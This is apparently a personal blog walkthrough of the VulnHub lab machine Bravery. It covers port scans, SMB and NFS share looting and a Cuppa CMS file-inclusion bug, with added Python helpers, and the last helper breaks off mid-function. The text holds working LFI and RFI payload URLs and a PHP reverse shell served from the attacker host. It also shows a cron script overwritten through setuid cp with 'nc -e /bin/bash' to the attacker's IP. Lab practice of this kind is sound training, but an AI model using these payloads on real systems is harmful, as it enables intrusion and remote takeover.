Digitalworld Bravery VulnHub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.


Digitalworld.local Bravery https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

This box was basically all dependent on enumeration. There’s a lot to look at and go through, but you have to keep going and searching. 95% of the time is spent getting the initial shell. I really liked this box because I got to focus on enumeration and note-taking.

Keeping a cool head, taking good notes about what was found and tried, and pushing forward was key. It isn’t a straight shot to a shell, and there’s a lot of content to go through.

Flow

  1. Run nmap
  2. Run gobuster on ports 80 and 8080
  3. Possible users discovered in /uploads, plus a note hinting at a cuppaCMS account
  4. NFS share available: /var/nfsshare holds a username and a likely password
  5. Used that user:pass with SMB on the anonymous share and the secured share
  6. /genevieve/ exists, /genevieve/cuppaCMS/index.php exists
  7. Cuppa CMS vulnerability exists and works
  8. Reverse shell by RFI
  9. MySQL access is possible, creds found but lead nowhere
  10. Run a suid/sgid check, find /usr/bin/cp is suid
  11. Can overwrite maintenance.sh script to get a root reverse shell

Enumeration

Nmap – TCP Ports

nmap -sC -sV -oA nmap/tcp_all_ports -p- 10.88.42.131
Nmap scan report for 10.88.42.131
Host is up (0.00053s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 4d:8f:bc:01:49:75:83:00:65:a9:53:a9:75:c6:57:33 (RSA)
|   256 92:f7:04:e2:09:aa:d0:d7:e6:fd:21:67:1f:bd:64:ce (ECDSA)
|_  256 fb:08:cd:e8:45:8c:1a:c1:06:1b:24:73:33:a5:e4:77 (ED25519)
53/tcp    open  domain      dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      40222/udp   nlockmgr
|   100021  1,3,4      40701/tcp6  nlockmgr
|   100021  1,3,4      45776/tcp   nlockmgr
|   100021  1,3,4      47137/udp6  nlockmgr
|   100024  1          35505/tcp   status
|   100024  1          37004/udp   status
|   100024  1          40896/udp6  status
|   100024  1          55507/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2018-06-10T15:53:25
|_Not valid after:  2019-06-10T15:53:25
|_ssl-date: TLS randomness does not represent time
445/tcp   open  netbios-ssn Samba smbd 4.7.1 (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     3 (RPC #100227)
3306/tcp  open  mysql       MariaDB (unauthorized)
8080/tcp  open  http        nginx 1.12.2
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 4 disallowed entries 
|_/cgi-bin/ /qwertyuiop.html /private /public
|_http-server-header: nginx/1.12.2
|_http-title: Welcome to Bravery! This is SPARTA!
20048/tcp open  mountd      1-3 (RPC #100005)
35505/tcp open  status      1 (RPC #100024)
45776/tcp open  nlockmgr    1-4 (RPC #100021)
MAC Address: 00:0C:29:AD:E6:EA (VMware)
Service Info: Host: BRAVERY

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.1)
|   Computer name: localhost
|   NetBIOS computer name: BRAVERY\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2020-06-18T07:43:48-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-18T11:43:48
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.15 seconds

Nmap – UDP Ports 1-1000

nmap -sU -sC -sV -oA nmap/udp_top_1000_ports -p 1-1000 10.88.42.131
Nmap scan report for 10.88.42.131
Host is up (0.00081s latency).
Not shown: 994 closed ports
PORT    STATE         SERVICE     VERSION
53/udp  open          domain      dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
|_dns-recursion: Recursion appears to be enabled
68/udp  open|filtered dhcpc
111/udp open          rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      40222/udp   nlockmgr
|   100021  1,3,4      40701/tcp6  nlockmgr
|   100021  1,3,4      45776/tcp   nlockmgr
|   100021  1,3,4      47137/udp6  nlockmgr
|   100024  1          35505/tcp   status
|   100024  1          37004/udp   status
|   100024  1          40896/udp6  status
|   100024  1          55507/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
137/udp open          netbios-ns  Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
846/udp open          rpcbind     2-4 (RPC #100000)
MAC Address: 00:0C:29:AD:E6:EA (VMware)
Service Info: Host: BRAVERY

Host script results:
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

I started a UDP scan of the ports above 1000, but I ended up rebooting and forgot to restart it. Luckily, I didn’t need it.

Services

A lot is going on here. Obviously, the web servers stand out, but so do the SMB and NFS shares. With dnsmasq on port 53, a DNS zone transfer might also turn up hostnames worth trying.

So, let’s dig in. Port 80, port 8080, SMB, and NFS.

Port 80

Gobuster

/about (Status: 200)
/1 (Status: 200)
/2 (Status: 200)
/4 (Status: 200)
/3 (Status: 200)
/contactus (Status: 200)
/5 (Status: 200)
/6 (Status: 200)
/9 (Status: 200)
/7 (Status: 200)
/0 (Status: 200)
/8 (Status: 200)
/uploads (Status: 301)

/8 Has Contents

80 and 8080 are best friends!

/about Has Contents

Visit https://www.captiongenerator.com/1075692/Try-Harder for a free hint! :-)

Nope! Not going to check that out.

/contactus Has Contents

Contact us at our hotline!

/uploads Has Contents

Possible users found from browsing the directory listings: patrick, qinyi, sara, and qiu.

/uploads/files/internal/department/procurement/sara/note.txt is the only file in there.

Remind gen to set up my cuppaCMS account.

Port 8080

/robots.txt

User-agent: *
Disallow: /cgi-bin/
Disallow: /qwertyuiop.html
Disallow: /private
Disallow: /public

/cgi-bin/

Returns 404.

/qwertyuiop.html

I viewed the source and looked at the image details, but didn’t find anything, so I stored “qwertyuiop” as a possible password.

/private

Returns 403.

/public

It appears to be a stubbed website. The one interesting thing is a mail.php that the server offers as a download rather than executing, so nginx on 8080 is not handing PHP to an interpreter at all.

Gobuster

/img (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

Normal stuff.

/public/about

Prompts to download this file with this content.

********** ABOUT US *********

* We are a fun-loving group *
  that takes our work quite
* seriously. In our line of *
  work, we believe that the 
* most important quality of *
  our work is our effort to 
* TRY HARDER. TRYING HARDER *
  takes courage. We believe 
* we can strive for greater *
  heights, and achieve good
* things as long as we dare *
  to TRY HARDER. Are you up 
* to our challenge? I think *
  you should TRY HARDER! :) 
*                           *

*****************************

MySQL

I can’t connect from my host. The server accepts the TCP connection and then rejects the client, so this is the MariaDB grant tables only allowing localhost, not a firewall.

ERROR 1130 (HY000): Host '10.88.42.130' is not allowed to connect to this MariaDB server

SMB

[17:34:34]🔴->1 root[ ~/VulnHub/bravery ]# smbclient -L \\\\10.88.42.131
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        anonymous       Disk      
        secured         Disk      
        IPC$            IPC       IPC Service (Samba Server 4.7.1)
SMB1 disabled -- no workgroup available
[17:34:42]🔥root[ ~/VulnHub/bravery ]# 

Unfortunately, I couldn’t access those shares without a login.

NFS

[17:19:59]🔥root[ ~/VulnHub/bravery ]# showmount -e 10.88.42.131
Export list for 10.88.42.131:
/var/nfsshare *
[17:20:02]🔥root[ ~/VulnHub/bravery ]# 
...
mkdir nfsshare
mount 10.88.42.131:/var/nfsshare nfsshare

Great! I got new files; now time to explore them.

nfsshare/README.txt
nfsshare/qwertyuioplkjhgfdsazxcvbnm
nfsshare/discovery
nfsshare/password.txt
nfsshare/explore
nfsshare/enumeration
nfsshare/itinerary
for file in $(find nfsshare -type f); do echo ">> $file <<"; cat "$file"; done

>> nfsshare/README.txt <<
read me first!
>> nfsshare/qwertyuioplkjhgfdsazxcvbnm <<
Sometimes, the answer you seek may be right before your very eyes.
>> nfsshare/discovery <<
Remember to LOOK AROUND YOU!
>> nfsshare/password.txt <<
Passwords should not be stored in clear-text, written in post-its or written on files on the hard disk!
>> nfsshare/explore <<
Exploration is fun!
>> nfsshare/enumeration <<
Enumeration is at the heart of a penetration test!
>> nfsshare/itinerary/david <<
David will need to fly to various cities for various conferences. Here is his schedule.

1 January 2019 (Tuesday):
New Year's Day. Spend time with family.

2 January 2019 (Wednesday): 
0900: Depart for airport.
0945: Check in at Changi Airport, Terminal 3.
1355 - 2030 hrs (FRA time): Board flight (SQ326) and land in Frankfurt.
2230: Check into hotel.

3 January 2019 (Thursday):
0800: Leave hotel.
0900 - 1700: Attend the Banking and Enterprise Conference.
1730 - 2130: Private reception with the Chancellor.
2230: Retire in hotel.

4 January 2019 (Friday):
0800: Check out from hotel.
0900: Check in at Frankfurt Main.
1305 - 1355: Board flight (LH1190) and land in Zurich.
1600 - 1900: Dinner reception
2000: Check into hotel.

5 January 2019 (Saturday):
0800: Leave hotel.
0930 - 1230: Visit University of Zurich.
1300 - 1400: Working lunch with Mr. Pandelson
1430 - 1730: Dialogue with students at the University of Zurich.
1800 - 2100: Working dinner with Mr. Robert James Miller and wife.
2200: Check into hotel.

6 January 2019 (Sunday):
0730: Leave hotel.
0800 - 1100: Give a lecture on Software Security and Design at the University of Zurich.
1130: Check in at Zurich.
1715 - 2025: Board flight (LX18) and land in Newark.
2230: Check into hotel.

7 January 2019 (Monday):
0800: Leave hotel.
0900 - 1200: Visit Goldman Sachs HQ
1230 - 1330: Working lunch with Bill de Blasio
1400 - 1700: Visit McKinsey HQ
1730 - 1830: Visit World Trade Center Memorial
2030: Return to hotel.

8 January 2019 (Tuesday):
0630: Check out from hotel.
0730: Check in at Newark.
0945 - 1715 (+1): Board flight (SQ21)

9 January 2019 (Wednesday):
1715: Land in Singapore.
1815 - 2015: Dinner with wife.
2100: Clear local emails and head to bed.

So, I have a username “david” and “qwertyuioplkjhgfdsazxcvbnm” is likely a password, too. That’s two clues to it now. I added the username and password to the growing password list.

SMB – Revisited

anonymous Share

Now that I have some usernames and passwords, I tried out “david” and “qwertyuioplkjhgfdsazxcvbnm” first, and it worked!

mkdir -p smb/anonymous
smbclient \\\\10.88.42.131\\anonymous -Udavid
smb: \> prompt
smb: \> recurse
smb: \> mget "patrick's folder"
smb: \> mget "qiu's folder"
smb: \> mget "genevieve's folder"
smb: \> mget "david's folder"
smb: \> mget "kenny's folder"
smb: \> mget "qinyi's folder"
smb: \> mget "sara's folder"
smb: \> mget readme.txt

There’s a ton of files to filter through.

[17:47:23]🔥root[ ~/VulnHub/bravery/smb/anonymous ]# find . -type f | wc -l
461
[17:47:29]🔥root[ ~/VulnHub/bravery/smb/anonymous ]# 

After manually going through the files, most of them are empty, so I decided to use some bash to go through them.

cd anonymous
find . -type f > ../filelist.txt
while read -r line; do
    [ -s "$line" ] || continue      # -s: exists and is larger than zero bytes
    echo ">> $line <<"
    cat "$line"
done < ../filelist.txt | tee ../anonymous_nonempty_files.txt

>> ./sara's folder/gossip_corner/gossip18 <<
Qiu gives me too much work. I'm really stressed.
>> ./sara's folder/gossip_corner/gossip27 <<
Misconfigurations are the nightmare of system administrators.
>> ./sara's folder/gossip_corner/gossip5 <<
If only I could get back at the boss... she's so nasty. She controls EVERYTHING and doesn't trust me in even administering her tomcat server.
>> ./sara's folder/gossip_corner/gossip23 <<
Que sera sera, whatever will be, will be.
>> ./sara's folder/email/2048 <<
2048 is a game.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

BUT...

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

The CTF is not just a game. It's more than a game. It's about TRYING HARDER... and making sure this machine gets rooted!

.
.
.

ALL THE BEST! TRY HARDER!
>> ./genevieve's folder/CMS/migration/important! <<
need to migrate CMS. obsolete. speak to qiu about temporarily using her IIS to test a sharepoint installation.
>> ./genevieve's folder/email/spear <<
Amidst the flurry of content are certain files that may stand out. Smart bravery will allow you to read what you want; stupid bravery is called recklessness.
>> ./patrick's folder/work!/present_for_qiu/present <<
Should I bring her to watch the "Phantom of the Opera"?

Hmmmm... but she looks so stressed recently... :-(
>> ./patrick's folder/work!/samba/david_secured_share/readme/readme.txt <<
Please DO NOT spread the password around.
>> ./kenny's folder/vuln_assessment_team/windows/XP_disclaimer <<
XP is no longer provided; please upgrade to win7 or win10 because we no longer support XP.
>> ./readme.txt <<
-- READ ME! --

This is an INTERNAL file-sharing system across SMB. While awaiting migration to Sharepoint, we are currently relying on the use of the SMB protocol to share information.

Once we migrate everything to Sharepoint, we will kill off this temporary service. This service will be re-purposes to only share UNCLASSIFIED information.

We also noticed the archival of plenty of e-mail. Please remove all of that before migration, unless you need them.

Regards
Genevieve the Brave

I didn’t see anything useful in the files, but I did add two new users: “kenny” and “genevieve.”
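The shell loop above does the job, but with a share this size it also helps to grep for the words that usually matter. Below is an added example (mine, not from the walkthrough) in Python that lists the non-empty files and flags lines mentioning passwords, CMSs, hostnames or share names; the directory tree it builds is constructed to resemble the dumped share, and the keyword list is my assumption.

```python
"""Triage a dumped share: list the non-empty files and pull out the lines that
hint at credentials, hosts or applications.  Added example, not part of the
walkthrough; the sample tree is constructed to resemble the 'anonymous' share
(mostly empty files, a few with text) and the keyword list is an assumption.
"""
import re
import tempfile
from pathlib import Path

# Words worth a second look when sifting hundreds of files; extend as needed.
HINT_RE = re.compile(
    r"\b(?:password|passwd|credential|login|cms|iis|tomcat|smb|nfs|share)\b"
    r"|https?://|\.php\b",
    re.IGNORECASE,
)


def nonempty_files(root):
    """Relative POSIX paths of regular files larger than zero bytes, sorted;
    the same test as `[ -s "$f" ]` in the shell loop."""
    root = Path(root)
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.is_file() and p.stat().st_size > 0
    )


def find_hints(root, pattern=HINT_RE):
    """(path, line_no, line) for every line of a non-empty file that matches
    the hint pattern.  Bytes that are not UTF-8 are replaced so a stray binary
    blob does not abort the sweep."""
    root = Path(root)
    hits = []
    for rel in nonempty_files(root):
        text = (root / rel).read_text(encoding="utf-8", errors="replace")
        for no, line in enumerate(text.splitlines(), 1):
            if pattern.search(line):
                hits.append((rel, no, line.strip()))
    return hits


def triage(root):
    """Totals plus the hint lines: the summary you want before reading
    hundreds of files by hand."""
    total = sum(1 for p in Path(root).rglob("*") if p.is_file())
    nonempty = nonempty_files(root)
    return {"total": total, "nonempty": len(nonempty), "hints": find_hints(root)}


def build_sample_share(dest):
    """Constructed stand-in for the dumped share: five text files in the same
    shape as the walkthrough's listing, padded with empty files."""
    dest = Path(dest)
    texts = {
        "sara's folder/gossip_corner/gossip5":
            "If only I could get back at the boss... she controls her tomcat server.",
        "sara's folder/gossip_corner/gossip27":
            "Misconfigurations are the nightmare of system administrators.",
        "genevieve's folder/CMS/migration/important!":
            "need to migrate CMS. obsolete. speak to qiu about using her IIS.",
        "patrick's folder/work!/samba/david_secured_share/readme/readme.txt":
            "Please DO NOT spread the password around.",
        "readme.txt":
            "This is an INTERNAL file-sharing system across SMB.",
    }
    for rel, body in texts.items():
        path = dest / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body, encoding="utf-8")
    empties = dest / "kenny's folder" / "email"
    empties.mkdir(parents=True, exist_ok=True)
    for i in range(20):
        (empties / f"mail{i}").touch()
    return dest


def demo():
    """Build the constructed share in a temporary directory, triage it and
    return the summary; the directory is removed afterwards."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage(build_sample_share(tmp))


if __name__ == "__main__":
    summary = demo()
    print(f"{summary['nonempty']} of {summary['total']} files are non-empty")
    for rel, no, line in summary["hints"]:
        print(f"{rel}:{no}: {line}")
```

Point triage() at the directory smbclient dumped into instead of the constructed tree; the gossip about "her tomcat server" and the "do not spread the password" note are exactly the kind of lines that get buried among 461 mostly empty files.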

secured Share

[18:15:37]🔥root[ ~/VulnHub/bravery/smb/secured ]# smbclient \\\\10.88.42.131\\secured -U david
Enter WORKGROUP\david's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Sep 28 09:52:14 2018
  ..                                  D        0  Thu Jun 14 12:30:39 2018
  david.txt                           N      376  Sat Jun 16 04:36:07 2018
  genevieve.txt                       N      398  Mon Jul 23 12:51:27 2018
  README.txt                          N      323  Mon Jul 23 21:58:53 2018

                17811456 blocks of size 1024. 13166144 blocks available
smb: \> prompt
smb: \> get *
NT_STATUS_OBJECT_NAME_INVALID opening remote file \*
smb: \> mget *
getting file \david.txt of size 376 as david.txt (73.4 KiloBytes/sec) (average 73.4 KiloBytes/sec)
getting file \genevieve.txt of size 398 as genevieve.txt (97.2 KiloBytes/sec) (average 84.0 KiloBytes/sec)
getting file \README.txt of size 323 as README.txt (105.1 KiloBytes/sec) (average 89.3 KiloBytes/sec)
smb: \> 

And the file contents.

[18:16:34]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat david.txt 
I have concerns over how the developers are designing their webpage. The use of "developmentsecretpage" is too long and unwieldy. We should cut short the addresses in our local domain.

1. Reminder to tell Patrick to replace "developmentsecretpage" with "devops".

2. Request the intern to adjust her Favourites to http://<developmentIPandport>/devops/directortestpagev1.php.
[18:16:37]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat genevieve.txt 
Hi! This is Genevieve!

We are still trying to construct our department's IT infrastructure; it's been proving painful so far.

If you wouldn't mind, please do not subject my site (http://192.168.254.155/genevieve) to any load-test as of yet. We're trying to establish quite a few things:

a) File-share to our director.
b) Setting up our CMS.
c) Requesting for a HIDS solution to secure our host.
[18:16:48]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat README.txt 
README FOR THE USE OF THE BRAVERY MACHINE:

Your use of the BRAVERY machine is subject to the following conditions:

1. You are a permanent staff in Good Tech Inc.
2. Your rank is HEAD and above.
3. You have obtained your BRAVERY badges.

For more enquiries, please log into the CMS using the correct magic word: goodtech.
[18:16:53]🔥root[ ~/VulnHub/bravery/smb/secured ]# 

So, this is awesome; now I have more web URLs that I didn’t have previously.

I tried /developmentsecretpage and /devops on port 80 and 8080, but it was 404 on both. Fortunately, /genevieve was not 404.

Port 80 – Revisited

Browsing to /genevieve shows a template site, but it links to Cuppa CMS!

http://10.88.42.131/genevieve/cuppaCMS/index.php

cuppaCMS

Searchsploit turned up a Cuppa CMS file-inclusion advisory (https://www.exploit-db.com/exploits/25971, the urlConfig parameter of alerts/alertConfigField.php). So I tried it, and it worked!

http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

Configuration.php contents, decoded from the base64 that the second URL returns. The php://filter wrapper is what gets PHP source back instead of letting the server execute the included file. I added the password to the list.

<?php 
	class Configuration{
		public $host = "localhost";
		public $db = "bravery";
		public $user = "root";
		public $password = "r00tisawes0me";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "goodtech";
		public $secure_login_redirect = "doorshell.jpg";
	} 
?>
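The two URLs above show the technique; the added example below (mine, not from the walkthrough or from Cuppa CMS) wraps it up: build the php://filter payload, pull the base64 out of the response and parse the `public $name = "value";` lines into a dict. The target URL, the parameter name and the embedded Configuration.php sample are assumptions modelled on the page; only fetch() touches the network.

```python
"""Recover PHP source through a file-inclusion bug with the php://filter wrapper
and extract the settings from Cuppa's Configuration.php.

Added example, not from the walkthrough or from Cuppa CMS.  VULN_URL, PARAM and
SAMPLE_SOURCE are assumptions modelled on the page; fetch() needs the network,
everything else runs offline.
"""
import base64
import re
import urllib.parse
import urllib.request

VULN_URL = "http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php"
PARAM = "urlConfig"


def filter_payload(resource):
    """Wrap a path in php://filter so include() returns the file base64-encoded
    instead of executing it; this is how .php source is read through an LFI."""
    return f"php://filter/convert.base64-encode/resource={resource}"


def build_url(resource, base=VULN_URL, param=PARAM):
    """Full request URL with the payload URL-encoded as a query parameter."""
    return f"{base}?{urllib.parse.urlencode({param: filter_payload(resource)})}"


def fetch(url, timeout=10):
    """Fetch the page body; the only network call in the module."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_base64(body):
    """The encoded file sits inside whatever HTML the page emits; take the
    longest base64-looking run, repair stripped padding and decode it."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not runs:
        raise ValueError("no base64 blob in response")
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


CONFIG_RE = re.compile(r'public\s+\$(\w+)\s*=\s*(?:"([^"]*)"|(\d+))\s*;')


def parse_configuration(source):
    """Turn `public $name = "value";` (or a bare number) into a dict.  Numbers
    stay as strings so the caller sees exactly what the PHP file held."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in CONFIG_RE.finditer(source)}


def recover_config(body):
    """Response body -> settings dict, the two steps above chained."""
    return parse_configuration(extract_base64(body))


# Constructed stand-in for the Configuration.php recovered on the box, wrapped
# in a little HTML the way a real response would be.
SAMPLE_SOURCE = '''<?php
\tclass Configuration{
\t\tpublic $host = "localhost";
\t\tpublic $db = "bravery";
\t\tpublic $user = "root";
\t\tpublic $password = "r00tisawes0me";
\t\tpublic $secure_login = 0;
\t\tpublic $secure_login_value = "goodtech";
\t}
?>'''
SAMPLE_BODY = ("<html><body>"
               + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
               + "</body></html>")


if __name__ == "__main__":
    print(build_url("../Configuration.php"))
    for key, val in recover_config(SAMPLE_BODY).items():
        print(f"{key} = {val}")
```

Against a live target, replace SAMPLE_BODY with fetch(build_url("../Configuration.php")). The relative path is resolved from the directory of the including script (alerts/), which is why one ../ reaches Configuration.php.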

So, I decided to give the RFI a go. Including a remote URL only works when PHP’s allow_url_include is On (it has defaulted to Off since 5.2), so this is worth testing rather than assuming.

mkdir www
cp /usr/share/laudanum/php/php-reverse-shell.php www/
cd www
vi php-reverse-shell.php        # set the callback IP and port to the attacking host
python3 -m http.server 80       # serve the file raw so the target fetches PHP source
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://10.88.42.130/php-reverse-shell.php
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http%3A%2F%2F10%2E88%2E42%2E130%2Fphp%2Dreverse%2Dshell%2Ephp

The second URL is the same request with the parameter URL-encoded.

Boom, Popped A Shell!

The RFI worked! I tried to su to david with the password I have, but it didn’t work out.

MySQL – Revisited

Hoping there were passwords stored in there to pivot to “david” or “rick,” I connected using the login info from Configuration.php.

The “cu_users” table has usernames and passwords in it.

I ran the MD5 hashes through CrackStation.net.

I added the extra usernames and passwords to the list. None of the passwords were meaningful to pivot to root or another user. The only MySQL user is the root user I connected with.

Normal Linux PrivEsc

Before running LinEnum.sh, I decided to search for SUID and SGID files.

Obviously, /usr/bin/cp is not supposed to be SUID, and it stood out like a sore thumb. A setuid-root cp writes its destination as root, so it can overwrite any file on the box.

From probing around before, I saw the maintenance.sh script but didn’t think much of it. It actually took me a little while to come back to it and realise I could use cp to overwrite it.

The script is run by root (likely by a cronjob) and is owned by root, and my user can’t write to it. That doesn’t matter here: cp opens the existing file and truncates it in place, which keeps the root ownership, so the cron job carries on running the file as root with my contents in it.

bash-4.2$ echo -e '#!/bin/sh\nnc -e /bin/bash 10.88.42.130 9999\n' > /tmp/maintenance.sh
bash-4.2$ cat /tmp/maintenance.sh
#!/bin/sh
nc -e /bin/bash 10.88.42.130 9999

bash-4.2$ cp /tmp/maintenance.sh /var/www/maintenance.sh; cat /var/www/maintenance.sh
#!/bin/sh
nc -e /bin/bash 10.88.42.130 9999

bash-4.2$ 

So, I overwrote it, left a listener running on port 9999 on my host, and waited… and the root shell popped!
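The SUID check, as an added example rather than the author’s command: walk the filesystem for setuid/setgid files and report the ones that are not on a baseline list. The baseline is an assumption (a typical CentOS 7 set; trim it for your target) and the demo tree containing a setuid cp is constructed.

```python
"""Find SUID/SGID files and flag the ones that have no business carrying the
bit, the check the walkthrough ran before LinEnum.

Added example, not from the page.  EXPECTED_SUID is an assumed baseline and
build_sample_tree() constructs a throwaway tree; only find_setid("/") looks at
the real host.
"""
import os
import stat
import tempfile
from pathlib import Path

# Binaries that legitimately carry setuid/setgid on a typical CentOS 7 host.
# Assumed baseline; anything not listed is reported for a human to judge.
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/pkexec", "/usr/bin/crontab",
    "/usr/sbin/unix_chkpwd", "/usr/sbin/pam_timestamp_check",
    "/usr/sbin/usernetctl", "/usr/libexec/dbus-1/dbus-daemon-launch-helper",
}


def find_setid(root="/"):
    """(path, mode, uid) for every regular file under root with the setuid or
    setgid bit, like `find / -type f -perm /6000`.  Unreadable directories
    are skipped rather than aborting the sweep."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # Do not wander into pseudo-filesystems on a real host.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append((path, stat.S_IMODE(st.st_mode), st.st_uid))
    return sorted(found)


def unexpected(entries, expected=EXPECTED_SUID, prefix=""):
    """Entries whose path (with an optional sandbox prefix stripped) is not in
    the baseline.  A setuid-root copy of cp, as on this box, lands here."""
    out = []
    for path, mode, uid in entries:
        logical = path[len(prefix):] if prefix and path.startswith(prefix) else path
        if logical not in expected:
            out.append((logical, mode, uid))
    return out


def build_sample_tree(dest):
    """Constructed mini-filesystem: a normal setuid passwd, a setuid cp that
    should not exist, and an ordinary binary.  Setting u+s on files we own
    needs no privilege, so this runs as an unprivileged user."""
    dest = Path(dest)
    (dest / "usr/bin").mkdir(parents=True)
    for name, mode in (("passwd", 0o4755), ("cp", 0o4755), ("ls", 0o755)):
        p = dest / "usr/bin" / name
        p.write_bytes(b"#!/bin/sh\n")
        p.chmod(mode)
    return str(dest)


def demo():
    """Audit the constructed tree and return the flagged logical paths."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp)
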